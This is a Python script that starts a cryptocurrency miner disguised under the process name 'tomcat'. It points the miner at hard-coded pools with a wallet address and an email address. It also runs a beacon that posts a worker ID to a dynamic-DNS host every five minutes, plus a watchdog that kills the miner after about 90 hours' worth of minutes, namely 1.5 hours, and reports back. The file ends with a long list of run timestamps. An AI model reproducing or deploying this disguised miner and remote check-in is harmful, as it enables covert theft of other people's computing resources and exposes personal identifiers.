import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:04.579325
#2018-02-17 17:24:06.195256
#2018-02-17 19:13:03.687441
#2018-02-17 21:02:03.785604
#2018-02-17 22:47:06.323331
#2018-02-18 00:32:05.007346
#2018-02-18 02:22:06.454286
#2018-02-18 04:09:03.372896
#2018-02-18 05:58:06.526959
#2018-02-18 07:50:02.122490
#2018-02-18 09:38:03.895179
#2018-02-18 11:24:04.776026
#2018-02-18 13:10:06.678603
#2018-02-18 14:59:01.643480
#2018-02-18 16:48:06.474486
#2018-02-18 18:36:01.600630
#2018-02-18 20:24:07.319777
#2018-02-18 22:10:07.146989
#2018-02-18 23:58:04.236882
#2018-02-19 01:44:07.036233
#2018-02-19 03:33:04.451059
#2018-02-19 05:18:07.229080
#2018-02-19 07:06:06.158908
#2018-02-19 08:55:06.994663
#2018-02-19 10:43:09.209116
#2018-02-19 12:31:07.959480
#2018-02-19 14:18:05.023738
#2018-02-19 16:07:06.370488
#2018-02-19 17:54:01.328353
#2018-02-19 19:40:11.103757
#2018-02-19 21:30:10.773829
#2018-02-19 23:17:04.299742
#2018-02-20 01:02:03.576732
#2018-02-20 02:51:01.572318
#2018-02-20 04:39:04.564469
#2018-02-20 06:23:01.909152
#2018-02-20 08:07:06.961920
#2018-02-20 09:52:05.381051
#2018-02-20 11:36:06.204194
#2018-02-20 13:23:07.136468
#2018-02-20 15:08:05.620011
#2018-02-20 16:52:06.975882
#2018-02-20 18:41:11.633249
#2018-02-20 20:33:05.954868
#2018-02-20 22:18:05.840105
#2018-02-20 23:58:04.515988
#2018-02-21 01:44:08.973587
#2018-02-21 03:33:07.112377
#2018-02-21 05:22:07.741729
#2018-02-21 07:10:05.804086
#2018-02-21 08:55:09.654439
#2018-02-21 10:43:03.875803
#2018-02-21 12:31:01.940376
#2018-02-21 14:17:01.615909
#2018-02-21 16:04:06.494566
#2018-02-21 17:55:07.355242
#2018-02-21 19:40:06.268680
#2018-02-21 21:27:06.710712
#2018-02-21 23:15:09.243521
#2018-02-22 01:05:05.636503
#2018-02-22 02:52:01.376604
#2018-02-22 04:38:07.355716
#2018-02-22 06:23:01.948503
#2018-02-22 08:10:07.677287
#2018-02-22 09:57:08.428202
#2018-02-22 11:43:04.180573
#2018-02-22 13:30:06.667126
#2018-02-22 15:18:08.343209
#2018-02-22 17:05:06.534681
#2018-02-22 18:52:01.502596
#2018-02-22 20:45:05.999581
#2018-02-22 22:30:05.175385
#2018-02-23 00:15:10.093808
#2018-02-23 02:06:04.115781
#2018-02-23 03:57:05.236614
#2018-02-23 05:44:06.572713
#2018-02-23 07:34:05.477194
#2018-02-23 09:37:02.068432
#2018-02-23 11:43:04.296843
#2018-02-23 13:33:04.231868
#2018-02-23 15:18:04.339986
#2018-02-23 17:05:04.070760
#2018-02-23 18:54:07.302910
#2018-02-23 20:40:06.706566
#2018-02-23 22:27:05.838635
#2018-02-24 00:12:01.667587
#2018-02-24 02:04:04.008548
#2018-02-24 03:54:07.539315
#2018-02-24 06:00:09.019310
#2018-02-24 07:48:07.380885
#2018-02-24 09:32:06.362811
#2018-02-24 11:25:01.459616
#2018-02-24 13:14:01.228666
#2018-02-24 15:04:01.317291
#2018-02-24 16:54:06.018751
#2018-02-24 18:42:04.140317
#2018-02-24 20:33:05.678184
#2018-02-24 22:35:05.607086
#2018-02-25 01:43:04.721775
#2018-02-25 05:11:06.458684
#2018-02-25 10:52:02.174136